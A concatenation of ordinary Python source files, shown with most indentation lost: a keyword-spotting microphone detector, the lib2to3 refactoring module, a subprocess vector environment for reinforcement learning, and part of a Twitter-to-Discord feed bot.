device_name = info.get("name")
print("device_name: ", device_name)
# find mic usb device
if device_name.find(self.RECORD_DEVICE_NAME) != -1:
device_index = index
# break
        if device_index != -1:
            print("found the device:")
            print(p.get_device_info_by_index(device_index))
        else:
            print("could not find the device")
return device_index
def store_frames_to_file(self, frames, name_id):
        # only one temporary wav file is reused in practice
wave_output_filename = self.RANDOM_PREFIX + "win.wav" # % (name_id)
wf = wave.open(os.path.join(self.WAV_PATH, wave_output_filename), 'wb')
wf.setnchannels(self.CHANNELS)
wf.setsampwidth(self.RECORD_WIDTH)
wf.setframerate(self.RATE)
wf.writeframes(b''.join(frames))
wf.close()
def read_from_stream(self):
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(self.RECORD_WIDTH),
channels=self.CHANNELS,
rate=self.RATE,
input=True,
input_device_index=self.device_index)
for i in range(0, self.frame_num_total):
# if self.end_event.is_set() is True:
# break
frame = stream.read(self.CHUNK)
self.frames_buffer.append(frame)
# if i % self.frame_num_win == 0 and i != 0:
# print("read in a window size")
# flush the buffer
            # after a large time duration to avoid high memory usage
if i % (self.frame_num_win * self.win_num_flush) == 0 and i != 0:
print("===== p1: set the flush")
self.flush_event.set()
self.buffer_lock.acquire()
self.frames_buffer = []
self.buffer_lock.release()
stream.stop_stream()
stream.close()
p.terminate()
def process_from_buffer(self):
# KwsNet = KwsNNet(os.path.join(self.WAV_PATH, self.RANDOM_PREFIX + "win.wav"), "Pretrained_models/DNN/DNN_M.pb", "Pretrained_models/labels.txt")
KwsNet = KwsNNet(os.path.join(self.WAV_PATH, self.RANDOM_PREFIX + "win.wav"), "follow.pb", "tmp/speech_commands_train/follow_labels.txt")
# init setting
window_count = 0
start_frame = 0
continous_wakeups = 0
while True:
frames = []
            if self.flush_event.is_set():
print("===== p2: detect the flush")
start_frame = 0
self.flush_event.clear()
time.sleep(self.WINDOW_SECONDS)
if start_frame >= self.frame_num_total:
print("ERROR: start frame out of buffer. ")
exit()
self.buffer_lock.acquire()
for i in range(0, self.frame_num_win):
                # detect index out of range, wait for p1 to fill the buffer
while (start_frame + i) >= len(self.frames_buffer):
continue
frames.append(self.frames_buffer[start_frame + i])
self.buffer_lock.release()
self.store_frames_to_file(frames, window_count)
# call DNN part to do inference for this file
this_frame_status = KwsNet.do_inference()
if this_frame_status == 1:
continous_wakeups += 1
print(continous_wakeups)
elif this_frame_status == 0:
continous_wakeups -= 0.3
if continous_wakeups < 0:
continous_wakeups = 0
# print(continous_wakeups)
if continous_wakeups >= 3:
print(" ====== wake up")
# self.end_event.set()
# break
# time.sleep(0.05)
window_count += 1
start_frame += self.frame_num_stride
# print("process a window")
def slide_win_loop(self):
p1 = threading.Thread(target=self.read_from_stream, args=())
p2 = threading.Thread(target=self.process_from_buffer, args=())
p1.start()
time.sleep(1)
time.sleep(self.WINDOW_SECONDS)
p2.start()
p1.join()
p2.join()
if __name__ == "__main__":
kws = KwsDetector(1, 2, 3, 4, 5, 6, 7)
kws.slide_win_loop()
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import pkgutil
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fix_names = []
for finder, name, ispkg in pkgutil.iter_modules(pkg.__path__):
if name.startswith("fix_"):
if remove_prefix:
name = name[4:]
fix_names.append(name)
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
        # NodePatterns must either have no type and no content
        #   or a type and content -- so they don't get any further
        # Always return leaves
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" % (pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(
pygram.python_grammar.symbol2number.values(), pygram.python_grammar.tokens
):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [
pkg_name + "." + fix_name for fix_name in get_all_fix_names(pkg_name, False)
]
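# For example, with the fixers shipped in the standard distribution,
# get_fixers_from_package("lib2to3.fixes") yields fully qualified names such as
# "lib2to3.fixes.fix_apply" and "lib2to3.fixes.fix_print" (illustrative; the
# exact list depends on which fix_*.py modules are present in the package).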
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
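# Quick illustration of the helper above (a sketch, not a doctest):
#   _detect_future_features("from __future__ import print_function\nx = 1\n")
#   returns frozenset({'print_function'}), while source without a __future__
#   import yields an empty frozenset.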
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {
"print_function": False,
"exec_function": False,
"write_unchanged_files": False,
}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
            explicit: a list of fixers to run even if they are marked explicit (not run by default).
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
self.grammar = pygram.python_grammar.copy()
if self.options["print_function"]:
del self.grammar.keywords["print"]
elif self.options["exec_function"]:
del self.grammar.keywords["exec"]
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(
self.grammar, convert=pytree.convert, logger=self.logger
)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
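    # Minimal usage sketch (assuming this module is importable as
    # lib2to3.refactor and the stock fixer package is installed):
    #
    #   from lib2to3.refactor import RefactoringTool, get_fixers_from_package
    #   tool = RefactoringTool(get_fixers_from_package("lib2to3.fixes"))
    #   tree = tool.refactor_string("print 'hello'\n", "<example>")
    #   # str(tree) is now the refactored source, e.g. "print('hello')\n"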
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX) :]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if (
fixer.explicit
and self.explicit is not True
and fix_mod_path not in self.explicit
):
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if not name.startswith(".") and os.path.splitext(name)[1] == py_ext:
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline="") as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(
str(tree)[:-1], filename, write=write, encoding=encoding
)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s", name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
# use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
                    # Sort by depth; apply fixers from the bottom of the AST to the top
                    match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
                    if fixer.keep_line_order:
                        # Some fixers (e.g. fix_imports) must be applied
                        # in the original file's line order
                        match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
                                # previous transformation; skip it
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
# new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
                                    if fxr not in match_set:
match_set[fxr] = []
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(
self, new_text, filename, old_text=None, write=False, encoding=None
):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding, newline="")
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(
self.refactor_doctest(block, block_lineno, indent, filename)
)
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif indent is not None and (
line.startswith(indent + self.PS2)
or line == indent + self.PS2.rstrip() + "\n"
):
block.append(line)
else:
if block is not None:
result.extend(
self.refactor_doctest(block, block_lineno, indent, filename)
)
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno, indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error(
"Can't parse docstring in %s line %s: %s: %s",
filename,
lineno,
err.__class__.__name__,
err,
)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[: lineno - 1], new[lineno - 1 :]
assert clipped == ["\n"] * (lineno - 1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix) :]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False, num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only
)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [
multiprocessing.Process(target=self._child) for i in range(num_processes)
]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only
)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs
)
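if __name__ == "__main__":
    # Usage sketch (not part of the original module; an assumption): if this
    # RefactoringTool follows the familiar lib2to3 interface, whose constructor
    # takes a list of fixer module names, a single fixer can be run over a
    # source string like so. "lib2to3.fixes.fix_print" is the stock lib2to3
    # fixer and is used here purely for illustration.
    tool = RefactoringTool(["lib2to3.fixes.fix_print"])
    tree = tool.refactor_string("print 'hello'\n", "<example>")
    if tree is not None:
        print(str(tree), end="")  # refactored source, e.g. print('hello')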
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from rlstudy.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
        bigimg = tile_images(imgs)  # NOTE: tile_images is not defined or imported in this module; it must be supplied by the surrounding package
if mode == 'human':
import cv2
cv2.imshow('vecenv', bigimg[:,:,::-1])
cv2.waitKey(1)
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
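if __name__ == "__main__":
    # Minimal usage sketch (not part of the original file). Assumptions: an
    # older `gym` release with the 4-tuple step API (matching the worker above)
    # is installed, "CartPole-v1" is available, and the VecEnv base class
    # exposes `action_space` as in OpenAI baselines.
    import gym
    def make_env():
        return gym.make("CartPole-v1")
    venv = SubprocVecEnv([make_env for _ in range(4)])
    obs = venv.reset()  # stacked observations, shape (4, ...)
    actions = [venv.action_space.sample() for _ in range(4)]
    venv.step_async(actions)
    obs, rewards, dones, infos = venv.step_wait()
    venv.close()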
|
twitterfeed.py
|
from StocktonBotPackage.DevUtilities import configutil, utils
from collections import OrderedDict
import discord
import tweepy
import os
import datetime
import threading
import asyncio
import json
import warnings
import copy
class TweepyClient:
def __init__(self, profile=None):
self.auth = tweepy.OAuthHandler(os.environ['TWITTER-API-KEY'], os.environ['TWITTER-API-KEY-SECRET'])
self.auth.set_access_token(os.environ['TWITTER-ACCESS-TOKEN'], os.environ['TWITTER-ACCESS-TOKEN-SECRET'])
self.api = tweepy.API(self.auth)
self.user_id = os.environ['TWITTER-ID-STOCKTON-ESPORTS']
self.profile = profile
def get_rate_limit(self):
remaining = self.api.rate_limit_status()['resources']['application']['/application/rate_limit_status']['remaining']
return remaining
def get_rates_timeline(self):
"""
:return: Timeline remaining rates
"""
return self.api.rate_limit_status()['resources']['statuses']['/statuses/user_timeline']['remaining']
def get_rates_id(self):
"""
:return: ID remaining rates
"""
return self.api.rate_limit_status()['resources']['statuses']['/statuses/show/:id']['remaining']
def get_all_rate_limits(self):
return self.api.rate_limit_status()
class StdOutListener(tweepy.StreamListener):
def __init__(self):
super().__init__()
self.is_streaming = False
self.social_media_channel = None
self.commands_channel = None
self.static_data = None
self.dynamic_data = None
self.error = None
def on_data(self, raw_data):
"""
This method is overridden.
:param raw_data: data that is streamed in from the stream listener
:return True if data was successfully streamed
"""
self.static_data = tweet_data_wrapper.get_static_data(raw_data)
        self.dynamic_data = tweet_data_wrapper.get_dynamic_data()
        return True  # Keep the tweepy stream alive, matching the documented return contract
def on_error(self, status):
"""
        Called when the stream passes an error status code to this listener.
"""
print(f"Twitter Stream Error: {status}")
self.error = status
def thread_stream(self):
"""
        Data retrieved is automatically piped to StdOutListener.
        Note: running in a separate thread lets the stream listen
        without blocking the rest of the process.
"""
print(f"Starting Twitter stream thread...")
self.is_streaming = True
stream = tweepy.Stream(client.auth, listener) # Listener is responsible for data handling
stream.filter(follow=[client.user_id]) # Function cuts off early here
class TweetDataRetrieverWrapper:
def __init__(self):
self._twitter_icon_url = "https://cdn.clipart.email/fcf0df581fb3270b21dc370803b034ad_logo-twitter-circle-png-transparent-image-47449-free-icons-and-_2267-2267.png"
self._tweet = None
def get_static_data(self, data, tweet_index=None):
"""
:param data: the data retrieved from either the stream or otherwise
manual API calls
:param tweet_index: default None- increment this index if you wish
to retrieve multiple tweets and are *manually* pulling the tweets
(i.e., direct status calls)
:return: tuple data in the following order:
:returns: text, date, handle, followers, following, username, icon_url,
thumbnail_url, img_url
return None if the tweet was not found (the poll method won't execute)
"""
self._tweet = self._get_tweet_from_data(data, tweet_index)
if self._tweet is None:
            console_color_red = '\033[91m'  # ANSI red
console_color_normal = '\033[0m'
print(f"{console_color_red}Tweet is none{console_color_normal}")
return None
text = self._get_full_text()
followers = self._tweet.user.followers_count
following = self._tweet.user.friends_count
username = self._tweet.user.name
icon_url = self._twitter_icon_url
# thumbnail_url = str(self._tweet.profile_image_url).replace("normal.jpg", "400x400.jpg")
thumbnail_url = "https://pbs.twimg.com/profile_images/1219805354059599872/sVdcP-_G_400x400.jpg"
handle = "@" + self._tweet.author.screen_name
twitter_url = f"https://www.twitter.com/{self._tweet.author.screen_name}"
if self._is_retweet(self._tweet):
text, handle, twitter_url = self._adjust_fields_for_retweet(text)
else:
if handle in text:
text = str(text).replace(f"{handle}", f"**{handle}**", 1)
handle = "Mention in " + handle
try:
website_url = self._tweet.entities['url']['urls'][0]['expanded_url'] # The user's linked personal website URL
except Exception:
website_url = twitter_url # Revert to user's twitter link if no personal website
try:
img_url = self._tweet.entities['media'][0]['media_url_https']
except Exception:
img_url = None
try:
month_day_year = datetime.datetime.date(self._tweet.created_at).strftime('%h %d, %Y')
normal_time = self._convert_from_military_to_normal(self._tweet.created_at)
date = month_day_year + " | " + normal_time
except Exception as e:
text = "Exception caught retrieving data:"
date = e
queue_wrapper.push_tweet_id_to_queue(self._tweet.id)
print(f"Pushed tweet ID to queue...")
return text, date, handle, followers, following, username, icon_url, thumbnail_url, website_url, twitter_url, img_url
def get_dynamic_data(self, tweet=None):
"""
:param tweet: For tweets retrieved manually
:return: dynamic data (will poll this method semi frequently)
:returns: favorites, retweets
Return None if tweet was not stored earlier
"""
if tweet is not None: # If tweet was already discovered
self._tweet = tweet
if self._tweet is None:
return None
retweets = self._tweet.retweet_count
if hasattr(self._tweet, "retweeted_status"):
favorites = self._tweet.retweeted_status.favorite_count
else:
favorites = self._tweet.favorite_count
return favorites, retweets
def _get_tweet_from_data(self, data, tweet_index=None):
"""
:return: tweet if data was pulled manually (from client.profile)
or automatically (from stream listener)
"""
        if hasattr(data, 'timeline') or tweet_index is not None:  # !tweet tweets
            tweet = data.timeline()[tweet_index]
            return tweet
        raw_tweet_data = json.loads(data)  # !populate tweets
        if 'id' in raw_tweet_data:  # Or streamed tweets
            raw_tweet_id = int(raw_tweet_data['id'])
            tweet = client.api.get_status(id=raw_tweet_id, tweet_mode='extended')
            return tweet
        return None  # No tweet could be extracted from the data (e.g. retweet/unretweet events)
def _convert_from_military_to_normal(self, datetime_obj, is_utc=False):
"""
:param datetime_obj: the tweet object associated with the datetime object
:param is_utc: streamed tweet objects return the time in UTC. This timezone
        is offset by an additional 4 hours, so the result requires extra processing to indicate that.
:return: military time converted to normal time, also with PM or AM
"""
military = datetime.datetime.time(datetime_obj).strftime('%H:%M')
hour = int(military[0] + military[1])
if is_utc:
# TODO: Fix 4 hour UTC offset
return datetime.datetime.time(datetime_obj).strftime(f'{hour}:%M (UTC)')
        if hour >= 13:
            hour -= 12  # Convert from the 24-hour clock to the 12-hour clock
            time_of_day = "P.M."
        elif hour == 12:
            time_of_day = "P.M."
        elif hour == 0:
            hour = 12
            time_of_day = "A.M."
        else:
            time_of_day = "A.M."
final_conversion = datetime.datetime.time(datetime_obj).strftime(f'{hour}:%M {time_of_day}')
return final_conversion
def _convert_from_datetime_string_to_object(self, raw_date_string):
"""
:param raw_date_string: the json string
to convert to datetime object
:return: the string turned into a datetime object
as *user's* tweet.created_at datetime format
Turning it into the tweet format will allow it to
be converted from military time to normal time,
